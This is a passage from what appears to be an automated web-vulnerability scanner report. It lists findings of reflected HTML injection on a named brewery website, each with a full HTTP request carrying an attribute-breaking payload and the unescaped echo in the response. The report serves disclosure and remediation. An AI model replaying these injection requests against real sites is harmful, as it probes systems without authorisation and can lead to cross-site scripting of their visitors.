Path:	/facebook/content/img/skin/ninkasi-random/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bee"><a>7966f95bbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook14bee"><a>7966f95bbb5/content/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook14bee"><a>7966f95bbb5_page" class="facebook14bee">
...[SNIP]...

1.163. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/ninkasi-random/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af568"><a>e655369a8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookaf568"><a>e655369a8f7/content/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookaf568"><a>e655369a8f7_page" class="facebookaf568">
...[SNIP]...

1.164. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/skin/ninkasi-random/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcab8"><a>b4e49b085cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbcab8"><a>b4e49b085cc/content/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookbcab8"><a>b4e49b085cc_page" class="facebookbcab8">
...[SNIP]...

1.165. http://www.ninkasibrewing.com/facebook/content/js/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><a>92edcf6844e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf5e7b"><a>92edcf6844e/content/js/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf5e7b"><a>92edcf6844e_page" class="facebookf5e7b">
...[SNIP]...

1.166. http://www.ninkasibrewing.com/facebook/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd76"><a>cf3d86cfba9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookccd76"><a>cf3d86cfba9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookccd76"><a>cf3d86cfba9_page" class="facebookccd76">
...[SNIP]...

1.167. http://www.ninkasibrewing.com/facebook/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c86"><a>90405adf417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke4c86"><a>90405adf417/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooke4c86"><a>90405adf417_page" class="facebooke4c86">
...[SNIP]...

1.168. http://www.ninkasibrewing.com/facebook/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd20"><a>8eded1a6aaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7bd20"><a>8eded1a6aaa/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook7bd20"><a>8eded1a6aaa_page" class="facebook7bd20">
...[SNIP]...

1.169. http://www.ninkasibrewing.com/facebook/content/js/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f08d3"><a>32a16c21b89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf08d3"><a>32a16c21b89/content/js/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf08d3"><a>32a16c21b89_page" class="facebookf08d3">
...[SNIP]...

1.170. http://www.ninkasibrewing.com/facebook/content/js/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694a2"><a>600e3070e71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook694a2"><a>600e3070e71/content/js/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook694a2"><a>600e3070e71_page" class="facebook694a2">
...[SNIP]...

1.171. http://www.ninkasibrewing.com/facebook/content/js/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d13"><a>4dcbedf8a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka9d13"><a>4dcbedf8a30/content/js/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooka9d13"><a>4dcbedf8a30_page" class="facebooka9d13">
...[SNIP]...

1.172. http://www.ninkasibrewing.com/facebook/content/js/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5ea"><a>bca6b40fe7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook2d5ea"><a>bca6b40fe7b/content/js/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook2d5ea"><a>bca6b40fe7b_page" class="facebook2d5ea">
...[SNIP]...

1.173. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90ee5"><a>3e6417b9771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook90ee5"><a>3e6417b9771/content/js/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook90ee5"><a>3e6417b9771_page" class="facebook90ee5">
...[SNIP]...

1.174. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/js/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4808"><a>15a45105ef8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke4808"><a>15a45105ef8/content/js/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooke4808"><a>15a45105ef8_page" class="facebooke4808">
...[SNIP]...

1.175. http://www.ninkasibrewing.com/help/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d171a"><a>6ee7d9ed931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /helpd171a"><a>6ee7d9ed931/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="helpd171a"><a>6ee7d9ed931_page" class="helpd171a">
...[SNIP]...

1.176. http://www.ninkasibrewing.com/help/beer_finder/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88caf"><a>00b68d8c362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help88caf"><a>00b68d8c362/beer_finder/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help88caf"><a>00b68d8c362_page" class="help88caf">
...[SNIP]...

1.177. http://www.ninkasibrewing.com/help/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8623a"><a>0cfef24a7a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help8623a"><a>0cfef24a7a5/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help8623a"><a>0cfef24a7a5_page" class="help8623a">
...[SNIP]...

1.178. http://www.ninkasibrewing.com/help/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6325e"><a>44db42daa5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help6325e"><a>44db42daa5a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help6325e"><a>44db42daa5a_page" class="help6325e">
...[SNIP]...

1.179. http://www.ninkasibrewing.com/help/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ae0"><a>a81cb64163d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help41ae0"><a>a81cb64163d/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
